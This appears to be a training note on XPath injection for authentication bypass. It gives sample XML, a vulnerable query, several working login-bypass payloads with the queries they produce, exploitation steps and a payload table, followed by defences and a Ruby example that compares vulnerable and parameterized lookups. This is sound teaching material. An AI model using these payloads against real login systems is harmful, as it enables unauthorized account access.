# XPath Injection - Authentication Bypass

#### **Key Concepts**

1. **What is XPath?**
   * XPath is a query language for selecting nodes from an XML document.
   * It is often used in web applications for data retrieval and authentication mechanisms.
2. **What is XPath Injection?**
   * An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.

***

#### **XPath Query Example**

Consider the following XML user data:

```xml
<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>
```

Authentication might use the following query:

```xpath
/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
```

If the `USERNAME` and `PASSWORD` values are inserted into this string without sanitization, a single quote in the input closes the literal and the rest of the input becomes part of the predicate, so injection becomes possible.

***

#### **Common Payloads**

1. **Universal True (Bypass Authentication)**:

   ```plaintext
   ' or '1'='1
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or '1'='1' and password/text()='']
   ```
2. **Target a Specific User (Admin)**:

   ```plaintext
   admin' or '1'='1
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
   ```
3. **Use Position-Based Targeting**:

   ```plaintext
   ' or position()=2 or '
   ```

   Change the `2` to a `3` to pivot to a different account:

   ```plaintext
   ' or position()=3 or '
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
   ```

   * This targets the second user in the XML file (e.g., `admin`). The trailing `or '` absorbs the `and password/text()=...` clause, so the predicate is true for the node at that position regardless of the password.
4. **Substring Matching**:

   ```plaintext
   ' or contains(.,'admin') or '
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
   ```

   * Searches for any user with "admin" in their username or other fields.

***

#### **Steps to Exploit**

1. **Analyze Application Behavior**:
   * Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
2. **Test for Injection Points**:
   * Inject payloads into the username or password fields to observe server responses.
3. **Craft Payloads**:
   * Use payloads like `position()` or `contains()` to refine your query targeting.
4. **Privilege Escalation**:
   * Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.

***

#### **Practical Exploitation Example**

**Payload to Target Admin (Second User):**

```plaintext
username=' or position()=2 or '&password=irrelevant
```

**Response Example**:

* The application responds with `WELCOME SUPERUSER!`, confirming login as the second user.

***

#### **Defense Measures**

1. **Sanitize Inputs**:
   * Use proper input validation and encoding to prevent injection.
   * Reject special characters like `'`, `"`, `[`, and `]`.
2. **Parameterized Queries**:
   * Avoid building XPath queries by string concatenation. Use an XPath API that binds values to variables, so the expression stays fixed and the input is only ever compared as a string:

     ```php
     // $username and $password are XPath variable references bound by the API, not PHP string interpolation (hence the single-quoted PHP string)
     $query = '/users/user[username/text()=$username and password/text()=$password]';
     ```
3. **Hash Passwords**:
   * Ensure passwords are hashed before storage and comparison.
4. **Error Messages**:
   * Avoid detailed error messages that reveal query structures.
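The following example, added here and not part of the original notes or of any HTB material, runs the query shape from the "XPath Query Example" section against the page's two-user XML in both its vulnerable and its hardened form, and applies the input check from the "Sanitize Inputs" item. It uses Ruby's bundled REXML library because `REXML::XPath.first` accepts a hash that binds `$name` variable references to values, which is the parameterized style the "Parameterized Queries" item describes (PHP's `DOMXPath` has no equivalent bind mechanism, so the PHP snippet above can only be a sketch). The function names `vulnerable_lookup`, `safe_lookup` and `allowed_input?` are this example's own.

```ruby
require 'rexml/document'

# Constructed sample data: the same two users as the XML shown on the page.
USERS_XML = <<~XML
  <users>
    <user>
      <username>htb-stdnt</username>
      <password>Academy_student!</password>
    </user>
    <user>
      <username>admin</username>
      <password>admin</password>
    </user>
  </users>
XML

USERS_DOC = REXML::Document.new(USERS_XML)

# Vulnerable: untrusted input is interpolated straight into the predicate,
# so a quote in the input closes the literal and rewrites the query's logic.
# Returns the matched username, or nil when nothing matches.
def vulnerable_lookup(username, password)
  query = "/users/user[username/text()='#{username}' and password/text()='#{password}']"
  node = REXML::XPath.first(USERS_DOC, query)
  node && node.elements['username'].text
end

# Hardened: the expression is fixed text and the values travel separately
# through REXML's variable hash, so they can only ever be compared as strings.
def safe_lookup(username, password)
  query = '/users/user[username/text()=$u and password/text()=$p]'
  node = REXML::XPath.first(USERS_DOC, query, {}, { 'u' => username, 'p' => password })
  node && node.elements['username'].text
end

# Defence in depth from the "Sanitize Inputs" item: reject the XPath
# metacharacters the page lists before the value gets near a query at all.
XPATH_META = /['"\[\]]/
def allowed_input?(value)
  !value.match?(XPATH_META)
end

if __FILE__ == $PROGRAM_NAME
  payload = "' or position()=2 or '"
  puts "vulnerable: #{vulnerable_lookup(payload, 'irrelevant').inspect}"
  puts "safe:       #{safe_lookup(payload, 'irrelevant').inspect}"
  puts "safe, real: #{safe_lookup('admin', 'admin').inspect}"
  puts "validator:  #{allowed_input?(payload)}"
end
```

Running it shows the position-based payload from the page selecting `admin` through `vulnerable_lookup` while `safe_lookup` returns `nil` for the same input and still authenticates genuine credentials; `allowed_input?` rejects the payload before any query is built. In a real application the `password` element would hold a hash and the comparison would happen in code after looking the user up by username alone, as the "Hash Passwords" item recommends.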

***

#### **Key Takeaways**

* XPath Injection is similar to SQL Injection but targets XML queries.
* Functions like `position()` and `contains()` can help refine targeting in complex scenarios.
* Proper sanitization and secure coding practices are essential to mitigate these attacks.

***

#### **Payloads to Remember**

| **Scenario**                       | **Payload**                     | **Result**                            |
| ---------------------------------- | ------------------------------- | ------------------------------------- |
| Bypass Authentication              | `' or '1'='1`                   | Logs in as the first user.            |
| Target Specific User (e.g., Admin) | `admin' or '1'='1`              | Logs in as admin.                     |
| Position-Based User Targeting      | `' or position()=2 or '`        | Logs in as the second user.           |
| Substring Matching (Admin)         | `' or contains(.,'admin') or '` | Finds users with "admin" in username. |
